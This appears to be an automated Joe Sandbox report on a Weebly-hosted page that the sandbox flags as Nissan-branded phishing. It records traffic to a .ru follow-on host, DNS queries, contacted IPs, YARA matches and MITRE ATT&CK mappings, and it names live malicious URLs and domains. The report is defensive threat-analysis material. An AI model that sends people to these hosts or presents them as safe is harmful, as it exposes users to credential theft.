Edit tour

Windows Analysis Report
https://simatantincendi.weebly.com/

Overview

General Information

Sample URL:	https://simatantincendi.weebly.com/
Analysis ID:	1576111
Infos:

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish44

AI detected suspicious URL

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1912,i,4461686388526085709,17730214730380072810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://simatantincendi.weebly.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_134	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://simatantincendi.weebly.com/	Joe Sandbox AI: Score: 9 Reasons: The brand 'Nissan' is a well-known automotive manufacturer., The URL 'simatantincendi.weebly.com' does not match the legitimate domain 'nissan.com'., The domain 'weebly.com' is a platform for creating websites, which can be used by anyone, increasing the risk of phishing., The subdomain 'simatantincendi' does not have any apparent connection to Nissan, which is suspicious., The presence of a generic email input field without any specific context or branding increases suspicion. DOM: 1.1.pages.csv
Source: https://simatantincendi.weebly.com/	Joe Sandbox AI: Score: 9 Reasons: The brand 'Nissan' is a well-known automotive manufacturer., The URL 'simatantincendi.weebly.com' does not match the legitimate domain 'nissan.com'., The use of 'weebly.com', a website builder platform, suggests this is a personal or small business site, not an official Nissan site., The subdomain 'simatantincendi' is unrelated to Nissan and is suspicious., The presence of an email input field could be used for phishing purposes. DOM: 1.2.pages.csv

Yara detected HtmlPhish44

Source: Yara match

File source: dropped/chromecache_134, type: DROPPED

AI detected suspicious URL

Source: Email

Joe Sandbox AI: AI detected IP in URL: https://684.termlicari.ru

Source: https://simatantincendi.weebly.com/	HTTP Parser: No favicon
Source: https://simatantincendi.weebly.com/	HTTP Parser: No favicon
Source: https://simatantincendi.weebly.com/	HTTP Parser: No favicon
Source: https://684.termlicari.ru/HnkNbg/	HTTP Parser: No favicon
Source: https://684.termlicari.ru/HnkNbg/	HTTP Parser: No favicon

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49785 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200

Source: global traffic	DNS traffic detected: DNS query: simatantincendi.weebly.com
Source: global traffic	DNS traffic detected: DNS query: cdn2.editmysite.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ec.editmysite.com
Source: global traffic	DNS traffic detected: DNS query: 684.termlicari.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: vnlwvl177gpmte6zxp4fqjrlvykjvt4pw3givqitiuyvveb6g9eulf2w.bfcgpixdwnw.ru
Source: global traffic	DNS traffic detected: DNS query: www.outlook.com
Source: global traffic	DNS traffic detected: DNS query: outlook.live.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: assets.onestore.ms
Source: global traffic	DNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global traffic	DNS traffic detected: DNS query: c.s-microsoft.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49785 version: TLS 1.2

Source: classification engine

Classification label: mal60.phis.win@23/52@54/255

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1912,i,4461686388526085709,17730214730380072810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://simatantincendi.weebly.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1912,i,4461686388526085709,17730214730380072810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	3 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://simatantincendi.weebly.com/	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ooc-g2.tm-4.office.com	40.99.32.114	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
sp-2020021412301152490000000a-1069308460.us-west-2.elb.amazonaws.com	44.235.253.37	true	false	unknown
code.jquery.com	151.101.2.137	true	false	high
cdnjs.cloudflare.com	104.17.25.14	true	false	high
challenges.cloudflare.com	104.18.95.41	true	false	high
weebly.map.fastly.net	151.101.1.46	true	false	unknown
www.google.com	142.250.181.68	true	false	high
olc-g2.tm-4.office.com	40.99.70.210	true	false	unknown
684.termlicari.ru	172.67.161.180	true	true	unknown
simatantincendi.weebly.com	74.115.51.9	true	true	unknown
vnlwvl177gpmte6zxp4fqjrlvykjvt4pw3givqitiuyvveb6g9eulf2w.bfcgpixdwnw.ru	104.21.65.72	true	false	unknown
cdn2.editmysite.com	unknown	unknown	false	high
outlook.live.com	unknown	unknown	false	high
assets.onestore.ms	unknown	unknown	false	high
ajax.aspnetcdn.com	unknown	unknown	false	high
ec.editmysite.com	unknown	unknown	false	high
c.s-microsoft.com	unknown	unknown	false	high
www.outlook.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://simatantincendi.weebly.com/	true		unknown
https://684.termlicari.ru/HnkNbg/	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.19.206	unknown	United States	15169	GOOGLEUS	false
152.199.19.160	unknown	United States	15133	EDGECASTUS	false
74.115.51.8	unknown	United States	27647	WEEBLYUS	false
74.115.51.9	simatantincendi.weebly.com	United States	27647	WEEBLYUS	true
104.102.41.166	unknown	United States	16625	AKAMAI-ASUS	false
172.67.161.180	684.termlicari.ru	United States	13335	CLOUDFLARENETUS	true
151.101.66.137	unknown	United States	54113	FASTLYUS	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
172.217.21.35	unknown	United States	15169	GOOGLEUS	false
64.233.162.84	unknown	United States	15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
172.217.17.42	unknown	United States	15169	GOOGLEUS	false
44.235.253.37	sp-2020021412301152490000000a-1069308460.us-west-2.elb.amazonaws.com	United States	16509	AMAZON-02US	false
104.17.24.14	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.65.72	vnlwvl177gpmte6zxp4fqjrlvykjvt4pw3givqitiuyvveb6g9eulf2w.bfcgpixdwnw.ru	United States	13335	CLOUDFLARENETUS	false
23.218.209.163	unknown	United States	6453	AS6453US	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
40.99.32.114	ooc-g2.tm-4.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.99.70.210	olc-g2.tm-4.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
184.30.21.171	unknown	United States	16625	AKAMAI-ASUS	false
172.217.19.8	unknown	United States	15169	GOOGLEUS	false
172.217.17.35	unknown	United States	15169	GOOGLEUS	false
151.101.1.46	weebly.map.fastly.net	United States	54113	FASTLYUS	false
142.250.181.142	unknown	United States	15169	GOOGLEUS	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
2.18.64.214	unknown	European Union	6057	AdministracionNacionaldeTelecomunicacionesUY	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576111
